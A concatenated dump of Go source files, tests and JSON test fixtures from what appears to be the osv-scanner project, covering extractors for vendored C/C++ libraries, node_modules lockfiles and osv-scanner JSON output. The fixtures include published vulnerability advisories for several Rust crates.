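	// New() leaves OSVClient nil until Configure is called. Fail with a clear
	// error instead of calling a method on a nil client, which would most
	// likely panic in the middle of a scan.
	if e.OSVClient == nil {
		return inventory.Inventory{}, errors.New("vendored extractor: OSV client is not configured")
	}

	results, err := e.queryDetermineVersions(ctx, input.Path, input.FS, e.ScanGitDir)
	if err != nil {
		return inventory.Inventory{}, err
	}

	var packages []*extractor.Package

	matches := results.GetMatches()
	if len(matches) > 0 && matches[0].GetScore() > determineVersionThreshold {
		best := matches[0]
		packages = append(packages, &extractor.Package{
			SourceCode: &extractor.SourceCodeIdentifier{
				Commit: best.GetRepoInfo().GetCommit(),
			},
			Location: extractor.LocationFromPath(input.Path),
		})
	}

	return inventory.Inventory{
		Packages: packages,
	}, nil
}

// ToPURL converts an inventory created by this extractor into a PURL.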
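func (e *Extractor) ToPURL(_ *extractor.Package) *purl.PackageURL { return nil }

// Ecosystem returns an empty string as all inventories are commit hashes
func (e *Extractor) Ecosystem(_ *extractor.Package) string { return "" }

// queryDetermineVersions hashes the C/C++ sources under repoDir and asks the
// OSV service which upstream version they most resemble.
//
// The walk covers fsys starting at repoDir. Directories whose lower-cased name
// is in vendoredLibNames are skipped, and so are directories containing a
// ".git" entry unless scanGitDir is set. Every remaining file whose extension
// is in fileExts is read and MD5-hashed. The query sent through e.OSVClient
// contains the base name of repoDir plus, per file, its path relative to
// repoDir and its digest, so that information leaves the scanning host.
//
// An error is returned when the root cannot be read, a file cannot be opened
// or read, more than maxDetermineVersionFiles hashes are collected, or the
// remote call fails.
func (e *Extractor) queryDetermineVersions(ctx context.Context, repoDir string, fsys scalibrfs.FS, scanGitDir bool) (*api.VersionMatchList, error) {
	var hashes []*api.FileHash

	err := fs.WalkDir(fsys, repoDir, func(p string, d fs.DirEntry, walkErr error) error {
		// fs.WalkDir passes a nil entry when the initial stat of the root
		// fails; report that error instead of dereferencing d. Errors reported
		// for directories further down keep being ignored (best effort), as
		// before.
		if d == nil {
			return walkErr
		}

		if d.IsDir() {
			if !scanGitDir {
				// NOTE(review): filepath.Join uses the host separator while
				// fs.FS paths are slash separated; this may be related to the
				// test being skipped on Windows. Confirm before changing.
				if _, err := fsys.Stat(filepath.Join(p, ".git")); err == nil {
					// Found a git repo, stop here as otherwise we may get duplicated
					// results with our regular git commit scanning.
					return filepath.SkipDir
				}
			}

			if _, ok := vendoredLibNames[strings.ToLower(d.Name())]; ok {
				// Ignore nested vendored libraries, as they can cause bad matches.
				return filepath.SkipDir
			}

			return nil
		}

		if !slices.Contains(fileExts, filepath.Ext(p)) {
			return nil
		}

		file, err := fsys.Open(p)
		if err != nil {
			return err
		}
		// Release the handle once this file is hashed; a directory can hold up
		// to maxDetermineVersionFiles matching files, and leaving each one open
		// can exhaust the process's file descriptors.
		defer file.Close()

		// NOTE(review): the whole file is buffered before hashing, so memory
		// use follows the largest source file in the scanned tree. Streaming
		// into a hash.Hash would bound it.
		buf := bytes.NewBuffer(nil)
		if _, err = io.Copy(buf, file); err != nil {
			return err
		}

		hash := md5.Sum(buf.Bytes()) //nolint:gosec
		hashes = append(hashes, &api.FileHash{
			// Strip only the leading repoDir. Replacing every occurrence would
			// also rewrite later path components that happen to contain the
			// same text and so change the path reported for the file.
			FilePath: strings.TrimPrefix(p, repoDir),
			Hash:     hash[:],
		})

		if len(hashes) > maxDetermineVersionFiles {
			return errors.New("too many files to hash")
		}

		return nil
	})
	if err != nil {
		return nil, fmt.Errorf("failed during hashing: %w", err)
	}

	result, err := e.OSVClient.ExperimentalDetermineVersion(ctx, &api.DetermineVersionParameters{
		Query: &api.VersionQuery{
			Name:       filepath.Base(repoDir),
			FileHashes: hashes,
		},
	})
	if err != nil {
		return nil, fmt.Errorf("failed to determine versions: %w", err)
	}

	return result, nil
}

var _ filesystem.Extractor = &Extractor{}

// configurable is implemented by plugins that accept a Config.
type configurable interface {
	Configure(config Config)
}

// Configure copies ScanGitDir and OSVClient from config onto the extractor.
func (e *Extractor) Configure(config Config) {
	e.ScanGitDir = config.ScanGitDir
	e.OSVClient = config.OSVClient
}

var _ configurable = &Extractor{}

// Configure applies config to plug when plug implements configurable; any
// other plugin is left untouched.
func Configure(plug plugin.Plugin, config Config) {
	us, ok := plug.(configurable)
	if ok {
		us.Configure(config)
	}
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/vendored_test.go
================================================
package vendored_test

import (
	"io/fs"
	"path/filepath"
	"runtime"
	"testing"

	"github.com/google/go-cmp/cmp"
	"github.com/google/go-cmp/cmp/cmpopts"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/extractor/filesystem/simplefileapi"
	"github.com/google/osv-scalibr/testing/extracttest"
	"github.com/google/osv-scalibr/testing/fakefs"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"osv.dev/bindings/go/osvdev"
)

func TestExtractor_FileRequired(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name         string
		path         string
		isDir        bool
		wantRequired bool
	}{
		{
			name:         "Empty_path",
			path:         filepath.FromSlash(""),
			isDir:        false,
			wantRequired: false,
		},
		{
			name:         "single_directory_not_under_vendor_dir",
			path:         filepath.FromSlash("test_dir/"),
			isDir:        true,
			wantRequired: false,
		},
		{
			name:         "vendored_dir_itself_should_not_match",
			path:         filepath.FromSlash("vendor/"),
			isDir:        true,
			wantRequired: false,
		},
		{
			name:         "vendored_dir_itself_should_not_match_(no_trailing_slash)",
			path:         filepath.FromSlash("vendor"),
			isDir:        true,
			wantRequired: false,
		},
		{
			name:         "vendored_dir_with_child_non_directory_should_not_match",
			path:         filepath.FromSlash("vendor/abcd"),
			isDir:        false,
			wantRequired: false,
		},
		{
			name:         "vendored_dir_with_child_directory_should_match",
			path:         filepath.FromSlash("vendor/abcd/"),
			isDir:        true,
			wantRequired: true,
		},
		{
			name:         "vendored_dir_with_child_directory_should_match",
			path:         filepath.FromSlash("thirdparty/efgh/"),
			isDir:        true,
			wantRequired: true,
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			extr := vendored.Extractor{}

			permission := fs.ModePerm
			if tt.isDir {
				permission = fs.ModePerm | fs.ModeDir
			}

			isRequired := extr.FileRequired(simplefileapi.New(tt.path, fakefs.FakeFileInfo{
				FileName: filepath.Base(tt.path),
				FileMode: permission,
				FileSize: 1000,
			}))
			if isRequired != tt.wantRequired {
				t.Fatalf("FileRequired(%s): got %v, want %v", tt.path, isRequired, tt.wantRequired)
			}
		})
	}
}

func TestExtractor_Extract(t *testing.T) {
	t.Parallel()

	if runtime.GOOS == "windows" {
		// TODO: Reenable when #657 is resolved.
		testutility.Skip(t, "Temporarily disabled until #657 is resolved")
	}

	cwd := testutility.GetCurrentWorkingDirectory(t)
	tests := []extracttest.TestTableEntry{
		{
			Name: "zlib_test",
			InputConfig: extracttest.ScanInputMockConfig{
				Path:         "testdata/thirdparty/zlib",
				FakeScanRoot: cwd,
			},
			WantPackages: []*extractor.Package{
				{
					SourceCode: &extractor.SourceCodeIdentifier{
						Commit: "09155eaa2f9270dc4ed1fa13e2b4b2613e6e4851",
					},
					Location: extractor.LocationFromPath("testdata/thirdparty/zlib"),
				},
			},
		},
	}

	for _, tt := range tests {
		t.Run(tt.Name, func(t *testing.T) {
			t.Parallel()
			// NOTE(review): the default client presumably talks to the live
			// OSV API, so the expected commit depends on the service's index
			// and on the testdata files staying byte-identical. Confirm.
			extr := vendored.Extractor{
				OSVClient: osvdev.DefaultClient(),
			}

			scanInput := extracttest.GenerateScanInputMock(t, tt.InputConfig)
			defer extracttest.CloseTestScanInput(t, scanInput)

			got, err := extr.Extract(t.Context(), &scanInput)

			if diff := cmp.Diff(tt.WantErr, err, cmpopts.EquateErrors()); diff != "" {
				t.Errorf("%s.Extract(%q) error diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff)
				return
			}

			if diff := cmp.Diff(tt.WantPackages, got.Packages, cmpopts.SortSlices(extracttest.PackageCmpLess)); diff != "" {
				t.Errorf("%s.Extract(%q) diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff)
			}
		})
	}
}

================================================
FILE: internal/scalibrextract/language/javascript/nodemodules/extractor.go
================================================
// Package nodemodules provides an extractor for node_modules directories by reading the .package-lock.json file.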
package nodemodules

import (
	"context"
	"path/filepath"

	cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto"
	"github.com/google/osv-scalibr/extractor/filesystem"
	"github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson"
	"github.com/google/osv-scalibr/inventory"
	"github.com/google/osv-scalibr/plugin"
)

// Name is the unique name of this extractor.
const Name = "javascript/nodemodules"

// Extractor wraps the package-lock.json extractor so that it can be pointed
// at the hidden lockfile stored inside node_modules.
type Extractor struct {
	actualExtractor packagelockjson.Extractor
}

// New returns a new instance of the extractor; the plugin config is ignored.
func New(_ *cpb.PluginConfig) (filesystem.Extractor, error) {
	return &Extractor{}, nil
}

// Name of the extractor.
func (e Extractor) Name() string {
	return Name
}

// Version of the extractor.
func (e Extractor) Version() int {
	return 0
}

// Requirements of the extractor: no capabilities are requested.
func (e Extractor) Requirements() *plugin.Capabilities {
	return &plugin.Capabilities{}
}

// FileRequired returns true for .package-lock.json files under node_modules,
// that is, when the file's direct parent directory is named node_modules.
func (e Extractor) FileRequired(fapi filesystem.FileAPI) bool {
	candidate := fapi.Path()
	if filepath.Base(filepath.Dir(candidate)) != "node_modules" {
		return false
	}

	return filepath.Base(candidate) == ".package-lock.json"
}

// Extract extracts packages from the .package-lock.json file passed through
// the scan input by delegating to the wrapped package-lock.json extractor.
func (e Extractor) Extract(ctx context.Context, input *filesystem.ScanInput) (inventory.Inventory, error) {
	return e.actualExtractor.Extract(ctx, input)
}

var _ filesystem.Extractor = Extractor{}

================================================
FILE: internal/scalibrextract/language/osv/osvscannerjson/extractor.go
================================================
// Package osvscannerjson extracts osv-scanner's json output.
package osvscannerjson

import (
	"context"
	"encoding/json"
	"fmt"
	"path/filepath"

	cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/extractor/filesystem"
	"github.com/google/osv-scalibr/inventory"
	"github.com/google/osv-scalibr/plugin"
	"github.com/google/osv-scanner/v2/pkg/models"
)

const (
	// Name is the unique name of this extractor.
	Name = "osv/osvscannerjson"
)

// Extractor extracts osv packages from osv-scanner json output.
type Extractor struct{}

// Name of the extractor.
func (e Extractor) Name() string { return Name }

// Version of the extractor.
func (e Extractor) Version() int { return 0 }

// Requirements of the extractor.
func (e Extractor) Requirements() *plugin.Capabilities {
	return &plugin.Capabilities{}
}

// New returns a new instance of the extractor; the plugin config is ignored.
func New(_ *cpb.PluginConfig) (filesystem.Extractor, error) {
	return Extractor{}, nil
}

// FileRequired returns true only for osv-scanner-custom.json files,
// since this is specific to the osv-scanner JSON output
func (e Extractor) FileRequired(fapi filesystem.FileAPI) bool {
	// Only the base name is compared, so a file with this name is accepted in
	// any directory.
	return filepath.Base(fapi.Path()) == "osv-scanner-custom.json"
}

// Extract decodes an osv-scanner JSON results file from the scan input and
// returns one package per package entry found in it. Names, versions,
// ecosystems and commits are copied from the file as-is, without validation.
func (e Extractor) Extract(_ context.Context, input *filesystem.ScanInput) (inventory.Inventory, error) { parsedResults := models.VulnerabilityResults{} err := json.NewDecoder(input.Reader).Decode(&parsedResults) if err != nil { return inventory.Inventory{}, fmt.Errorf("could not extract from %s: %w", input.Path, err) } packages := []*extractor.Package{} for _, res := range parsedResults.Results { for _, pkg := range res.Packages { inv := extractor.Package{ Name: pkg.Package.Name, Version: pkg.Package.Version, Metadata: &Metadata{ Ecosystem: pkg.Package.Ecosystem, SourceInfo: res.Source, }, PURLType: "placeholder", Location: extractor.LocationFromPath(input.Path), Plugins: []string{"osv/osvscannerjson"}, } if pkg.Package.Commit != "" { inv.SourceCode = &extractor.SourceCodeIdentifier{ Commit: pkg.Package.Commit, } } packages = append(packages, &inv) } } return inventory.Inventory{ Packages: packages, }, nil } var _ filesystem.Extractor = Extractor{} ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/extractor_test.go ================================================ package osvscannerjson_test import ( "testing" "github.com/google/go-cmp/cmp" "github.com/google/go-cmp/cmp/cmpopts" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/testing/extracttest" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson" "github.com/google/osv-scanner/v2/pkg/models" ) func TestExtractor_Extract(t *testing.T) { t.Parallel() tests := []extracttest.TestTableEntry{ { Name: "invalid_yaml", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/not-json.txt", }, WantErr: extracttest.ContainsErrStr{Str: "could not extract from"}, }, { Name: "empty", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/empty.json", }, WantPackages: []*extractor.Package{}, }, { Name: "one_package", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/one-package.json", }, 
WantPackages: []*extractor.Package{ { Name: "activesupport", Version: "7.0.7", Location: extractor.LocationFromPath("testdata/one-package.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, Metadata: &osvscannerjson.Metadata{ Ecosystem: "RubyGems", SourceInfo: models.SourceInfo{ Path: "/path/to/Gemfile.lock", Type: "lockfile", }, }, }, }, }, { Name: "one_package_with_commit", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/one-package-commit.json", }, WantPackages: []*extractor.Package{ { Location: extractor.LocationFromPath("testdata/one-package-commit.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, SourceCode: &extractor.SourceCodeIdentifier{ Commit: "9a6bd55c9d0722cb101fe85a3b22d89e4ff4fe52", }, Metadata: &osvscannerjson.Metadata{ SourceInfo: models.SourceInfo{ Path: "/path/to/Gemfile.lock", Type: "lockfile", }, }, }, }, }, { Name: "multiple_packages", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/multiple-packages-with-vulns.json", }, WantPackages: []*extractor.Package{ { Name: "crossbeam-utils", Version: "0.6.6", Location: extractor.LocationFromPath("testdata/multiple-packages-with-vulns.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, Metadata: &osvscannerjson.Metadata{ Ecosystem: "crates.io", SourceInfo: models.SourceInfo{ Path: "/path/to/Cargo.lock", Type: "lockfile", }, }, }, { Name: "memoffset", Version: "0.5.6", Location: extractor.LocationFromPath("testdata/multiple-packages-with-vulns.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, Metadata: &osvscannerjson.Metadata{ Ecosystem: "crates.io", SourceInfo: models.SourceInfo{ Path: "/path/to/Cargo.lock", Type: "lockfile", }, }, }, { Name: "smallvec", Version: "1.6.0", Location: extractor.LocationFromPath("testdata/multiple-packages-with-vulns.json"), PURLType: "placeholder", Plugins: []string{"osv/osvscannerjson"}, Metadata: &osvscannerjson.Metadata{ Ecosystem: "crates.io", 
SourceInfo: models.SourceInfo{ Path: "/path/to/Cargo.lock", Type: "lockfile", }, }, }, }, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() extr := osvscannerjson.Extractor{} scanInput := extracttest.GenerateScanInputMock(t, tt.InputConfig) defer extracttest.CloseTestScanInput(t, scanInput) got, err := extr.Extract(t.Context(), &scanInput) if diff := cmp.Diff(tt.WantErr, err, cmpopts.EquateErrors()); diff != "" { t.Errorf("%s.Extract(%q) error diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) return } if diff := cmp.Diff(tt.WantPackages, got.Packages, cmpopts.SortSlices(extracttest.PackageCmpLess)); diff != "" { t.Errorf("%s.Extract(%q) diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) } }) } } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/metadata.go ================================================ package osvscannerjson import "github.com/google/osv-scanner/v2/pkg/models" // Metadata holds the metadata for osvscanner.json type Metadata struct { Ecosystem string SourceInfo models.SourceInfo } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/empty.json ================================================ { "results": [] } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/multiple-packages-with-vulns.json ================================================ { "results": [ { "source": { "path": "/path/to/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "crossbeam-utils", "version": "0.6.6", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2022-08-11T21:55:33Z", "published": "2022-02-16T22:36:21Z", "schema_version": "1.4.0", "id": "GHSA-qc84-gqf4-9926", "aliases": [ "CVE-2022-23639" ], "summary": "crossbeam-utils Race Condition vulnerability", "details": "### Impact\n\nThe affected 
version of this crate incorrectly assumed that the alignment of `{i,u}64` was always the same as `Atomic{I,U}64`. \n\nHowever, the alignment of `{i,u}64` on a 32-bit target can be smaller than `Atomic{I,U}64`.\n\nThis can cause the following problems:\n\n- Unaligned memory accesses\n- Data race\n\nCrates using `fetch_*` methods with `AtomicCell\u003c{i,u}64\u003e` are affected by this issue.\n\n32-bit targets without `Atomic{I,U}64` and 64-bit targets are not affected by this issue.\n32-bit targets with `Atomic{I,U}64` and `{i,u}64` have the same alignment are also not affected by this issue.\n\nThe following is a complete list of the builtin targets that may be affected. (last update: nightly-2022-02-11)\n\n- armv7-apple-ios (tier 3)\n- armv7s-apple-ios (tier 3)\n- i386-apple-ios (tier 3)\n- i586-unknown-linux-gnu\n- i586-unknown-linux-musl\n- i686-apple-darwin (tier 3)\n- i686-linux-android\n- i686-unknown-freebsd\n- i686-unknown-haiku (tier 3)\n- i686-unknown-linux-gnu\n- i686-unknown-linux-musl\n- i686-unknown-netbsd (tier 3)\n- i686-unknown-openbsd (tier 3)\n- i686-wrs-vxworks (tier 3)\n\n([script to get list](https://gist.github.com/taiki-e/3c7891e8c5f5e0cbcb44d7396aabfe10))\n\n### Patches\n\nThis has been fixed in crossbeam-utils 0.8.7.\n\nAffected 0.8.x releases have been yanked.\n\n### References\n\nhttps://github.com/crossbeam-rs/crossbeam/pull/781 \n\n### License\n\nThis advisory is in the public domain.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "crossbeam-utils", "purl": "pkg:cargo/crossbeam-utils" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-qc84-gqf4-9926/GHSA-qc84-gqf4-9926.json" } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "references": [ { "type": "WEB", "url": 
"https://github.com/crossbeam-rs/crossbeam/security/advisories/GHSA-qc84-gqf4-9926" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23639" }, { "type": "WEB", "url": "https://github.com/crossbeam-rs/crossbeam/pull/781" }, { "type": "PACKAGE", "url": "https://github.com/crossbeam-rs/crossbeam" }, { "type": "WEB", "url": "https://github.com/crossbeam-rs/crossbeam/releases/tag/crossbeam-utils-0.8.7" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0041.html" } ], "database_specific": { "cwe_ids": [ "CWE-362" ], "github_reviewed": true, "github_reviewed_at": "2022-02-16T22:36:21Z", "nvd_published_at": "2022-02-15T19:15:00Z", "severity": "HIGH" } }, { "modified": "2022-08-04T13:56:30Z", "published": "2022-02-05T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2022-0041", "aliases": [ "GHSA-qc84-gqf4-9926", "CVE-2022-23639" ], "summary": "Unsoundness of AtomicCell\u003c*64\u003e arithmetics on 32-bit targets that support Atomic*64", "details": "## Impact\n\nAffected versions of this crate incorrectly assumed that the alignment of {i,u}64 was always the same as Atomic{I,U}64.\n\nHowever, the alignment of {i,u}64 on a 32-bit target can be smaller than Atomic{I,U}64.\n\nThis can cause the following problems:\n\n- Unaligned memory accesses\n- Data race\n\nCrates using fetch_* methods with AtomicCell\u003c{i,u}64\u003e are affected by this issue.\n\n32-bit targets without Atomic{I,U}64 and 64-bit targets are not affected by this issue.\n\n32-bit targets with Atomic{I,U}64 and {i,u}64 have the same alignment are also not affected by this issue.\n\nThe following is a complete list of the builtin targets that may be affected. 
(last update: nightly-2022-02-11)\n\n- armv7-apple-ios (tier 3)\n- armv7s-apple-ios (tier 3)\n- i386-apple-ios (tier 3)\n- i586-unknown-linux-gnu\n- i586-unknown-linux-musl\n- i686-apple-darwin (tier 3)\n- i686-linux-android\n- i686-unknown-freebsd\n- i686-unknown-haiku (tier 3)\n- i686-unknown-linux-gnu\n- i686-unknown-linux-musl\n- i686-unknown-netbsd (tier 3)\n- i686-unknown-openbsd (tier 3)\n- i686-wrs-vxworks (tier 3)\n\n([script to get list](https://gist.github.com/taiki-e/3c7891e8c5f5e0cbcb44d7396aabfe10))\n\n## Patches\n\nThis has been fixed in crossbeam-utils 0.8.7.\n\nAffected 0.8.x releases have been yanked.\n\nThanks to @taiki-e", "affected": [ { "package": { "ecosystem": "crates.io", "name": "crossbeam-utils", "purl": "pkg:cargo/crossbeam-utils" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.7" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2022-0041.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/crossbeam-utils" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0041.html" }, { "type": "WEB", "url": "https://github.com/crossbeam-rs/crossbeam/pull/781" } ] } ], "groups": [ { "ids": [ "GHSA-qc84-gqf4-9926", "RUSTSEC-2022-0041" ] } ] }, { "package": { "name": "memoffset", "version": "0.5.6", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-06-21T22:06:29Z", "published": "2023-06-21T22:06:29Z", "schema_version": "1.4.0", "id": "GHSA-wfg4-322g-9vqv", "summary": "memoffset allows reading uninitialized memory", "details": "memoffset allows attempt of reading data from address `0` with arbitrary type. 
This behavior is an undefined behavior because address `0` to `std::mem::size_of\u003cT\u003e` may not have valid bit-pattern with `T`. Old implementation dereferences uninitialized memory obtained from `std::mem::align_of`. Older implementation prior to it allows using uninitialized data obtained from `std::mem::uninitialized` with arbitrary type then compute offset by taking the address of field-projection. This may also result in an undefined behavior for \"father\" that includes (directly or transitively) type that [does not allow to be uninitialized](https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html).\n\nThis flaw was corrected by using `std::ptr::addr_of` in \u003chttps://github.com/Gilnaa/memoffset/pull/50\u003e.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "memoffset", "purl": "pkg:cargo/memoffset" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.6.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-wfg4-322g-9vqv/GHSA-wfg4-322g-9vqv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/Gilnaa/memoffset/issues/24" }, { "type": "WEB", "url": "https://github.com/Gilnaa/memoffset/pull/50" }, { "type": "PACKAGE", "url": "https://github.com/Gilnaa/memoffset" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0045.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-06-21T22:06:29Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "modified": "2023-07-08T12:30:19Z", "published": "2023-06-21T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2023-0045", "aliases": [ "GHSA-wfg4-322g-9vqv" ], "summary": "memoffset allows reading uninitialized memory", "details": "memoffset allows attempt of reading data from address `0` with arbitrary type. 
This behavior is an undefined behavior because address `0` to `std::mem::size_of\u003cT\u003e` may not have valid bit-pattern with `T`. Old implementation dereferences uninitialized memory obtained from `std::mem::align_of`. Older implementation prior to it allows using uninitialized data obtained from `std::mem::uninitialized` with arbitrary type then compute offset by taking the address of field-projection. This may also result in an undefined behavior for \"father\" that includes (directly or transitively) type that [does not allow to be uninitialized](https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html).\n\nThis flaw was corrected by using `std::ptr::addr_of` in \u003chttps://github.com/Gilnaa/memoffset/pull/50\u003e.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "memoffset", "purl": "pkg:cargo/memoffset" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.6.2" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0045.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "memoffset::offset_of" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/memoffset" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0045.html" }, { "type": "REPORT", "url": "https://github.com/Gilnaa/memoffset/issues/24" } ] } ], "groups": [ { "ids": [ "GHSA-wfg4-322g-9vqv", "RUSTSEC-2023-0045" ] } ] }, { "package": { "name": "smallvec", "version": "1.6.0", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-06-13T20:51:42Z", "published": "2022-05-24T17:40:21Z", "schema_version": "1.4.0", "id": "GHSA-43w2-9j62-hq99", "aliases": [ "CVE-2021-25900" ], "summary": "Buffer overflow in SmallVec::insert_many", "details": "A bug in the SmallVec::insert_many method caused it to 
allocate a buffer that was smaller than needed. It then wrote past the end of the buffer, causing a buffer overflow and memory corruption on the heap. This bug was only triggered if the iterator passed to insert_many yielded more items than the lower bound returned from its size_hint method.\n\nThe flaw was corrected in smallvec 0.6.14 and 1.6.1, by ensuring that additional space is always reserved for each item inserted. The fix also simplified the implementation of insert_many to use less unsafe code, so it is easier to verify its correctness.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "smallvec", "purl": "pkg:cargo/smallvec" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.3" }, { "fixed": "0.6.14" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-43w2-9j62-hq99/GHSA-43w2-9j62-hq99.json" }, "ecosystem_specific": { "affected_functions": [ "smallvec::SmallVec::insert_many" ] } }, { "package": { "ecosystem": "crates.io", "name": "smallvec", "purl": "pkg:cargo/smallvec" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.6.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-43w2-9j62-hq99/GHSA-43w2-9j62-hq99.json" }, "ecosystem_specific": { "affected_functions": [ "smallvec::SmallVec::insert_many" ] } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25900" }, { "type": "WEB", "url": "https://github.com/servo/rust-smallvec/issues/252" }, { "type": "PACKAGE", "url": "https://github.com/servo/rust-smallvec" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2021-0003.html" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, 
"github_reviewed_at": "2022-06-17T00:20:48Z", "nvd_published_at": "2021-01-26T18:16:00Z", "severity": "CRITICAL" } }, { "modified": "2023-06-13T13:10:24Z", "published": "2021-01-08T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2021-0003", "aliases": [ "CVE-2021-25900", "GHSA-43w2-9j62-hq99" ], "summary": "Buffer overflow in SmallVec::insert_many", "details": "A bug in the `SmallVec::insert_many` method caused it to allocate a buffer that was smaller than needed. It then wrote past the end of the buffer, causing a buffer overflow and memory corruption on the heap.\n\nThis bug was only triggered if the iterator passed to `insert_many` yielded more items than the lower bound returned from its `size_hint` method.\n \nThe flaw was corrected in smallvec 0.6.14 and 1.6.1, by ensuring that additional space is always reserved for each item inserted. The fix also simplified the implementation of `insert_many` to use less unsafe code, so it is easier to verify its correctness.\n\nThank you to Yechan Bae (@Qwaz) and the Rust group at Georgia Tech’s SSLab for finding and reporting this bug.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "smallvec", "purl": "pkg:cargo/smallvec" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.3" }, { "fixed": "0.6.14" }, { "introduced": "1.0.0" }, { "fixed": "1.6.1" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2021-0003.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "smallvec::SmallVec::insert_many" ], "os": [] } } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/smallvec" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2021-0003.html" }, { "type": 
